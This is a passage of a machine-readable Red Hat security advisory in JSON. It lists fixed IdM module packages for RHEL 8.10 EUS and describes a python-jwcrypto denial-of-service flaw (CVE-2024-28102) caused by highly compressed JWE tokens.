"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "JWCrypto: denail of service Via specifically crafted JWE"
},
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
